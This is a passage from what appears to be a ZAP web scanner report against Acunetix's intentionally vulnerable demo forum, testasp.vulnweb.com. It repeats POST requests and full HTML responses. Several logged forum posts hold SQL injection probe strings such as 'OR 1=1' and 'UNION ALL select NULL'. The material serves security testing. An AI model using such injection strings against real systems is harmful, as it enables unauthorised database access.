href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3066 |
| Response Body - size: 3,066 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3084 |
| Response Body - size: 3,084 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div 